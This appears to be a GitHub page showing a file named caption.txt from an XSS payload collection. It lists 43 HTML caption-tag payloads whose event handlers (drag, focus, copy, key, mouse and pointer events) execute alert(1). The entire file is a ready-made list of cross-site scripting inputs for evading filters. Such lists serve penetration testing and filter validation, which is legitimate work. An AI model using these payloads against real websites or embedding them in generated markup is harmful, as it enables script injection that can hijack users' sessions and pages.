-
Notifications
You must be signed in to change notification settings - Fork 0
/
Copy pathcaption.txt
43 lines (43 loc) · 2.37 KB
/
caption.txt
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
<caption draggable="true" ondrag="alert(1)">test</caption>
<caption draggable="true" ondragend="alert(1)">test</caption>
<caption draggable="true" ondragenter="alert(1)">test</caption>
<caption draggable="true" ondragleave="alert(1)">test</caption>
<caption draggable="true" ondragstart="alert(1)">test</caption>
<caption id=x tabindex=1 onactivate=alert(1)></caption>
<caption id=x tabindex=1 onbeforeactivate=alert(1)></caption>
<caption id=x tabindex=1 onbeforedeactivate=alert(1)></caption><input autofocus>
<caption id=x tabindex=1 ondeactivate=alert(1)></caption><input id=y autofocus>
<caption id=x tabindex=1 onfocus=alert(1)></caption>
<caption id=x tabindex=1 onfocusin=alert(1)></caption>
<caption onafterscriptexecute=alert(1)><script>1</script>
<caption onbeforecopy="alert(1)" contenteditable>test</caption>
<caption onbeforecut="alert(1)" contenteditable>test</caption>
<caption onbeforepaste="alert(1)" contenteditable>test</caption>
<caption onbeforescriptexecute=alert(1)><script>1</script>
<caption onblur=alert(1) tabindex=1 id=x></caption><input autofocus>
<caption onclick="alert(1)">test</caption>
<caption oncontextmenu="alert(1)">test</caption>
<caption oncopy=alert(1) value="XSS" autofocus tabindex=1>test
<caption oncut=alert(1) value="XSS" autofocus tabindex=1>test
<caption ondblclick="alert(1)" autofocus tabindex=1>test</caption>
<caption onfocusout=alert(1) tabindex=1 id=x></caption><input autofocus>
<caption onkeydown="alert(1)" contenteditable>test</caption>
<caption onkeypress="alert(1)" contenteditable>test</caption>
<caption onkeyup="alert(1)" contenteditable>test</caption>
<caption onmousedown="alert(1)">test</caption>
<caption onmouseenter="alert(1)">test</caption>
<caption onmouseleave="alert(1)">test</caption>
<caption onmousemove="alert(1)">test</caption>
<caption onmouseout="alert(1)">test</caption>
<caption onmouseover="alert(1)">test</caption>
<caption onmouseup="alert(1)">test</caption>
<caption onmousewheel=alert(1)>requires scrolling
<caption onpaste="alert(1)" contenteditable>test</caption>
<caption onpointerdown=alert(1)>XSS</caption>
<caption onpointerenter=alert(1)>XSS</caption>
<caption onpointerleave=alert(1)>XSS</caption>
<caption onpointermove=alert(1)>XSS</caption>
<caption onpointerout=alert(1)>XSS</caption>
<caption onpointerover=alert(1)>XSS</caption>
<caption onpointerrawupdate=alert(1)>XSS</caption>
<caption onpointerup=alert(1)>XSS</caption>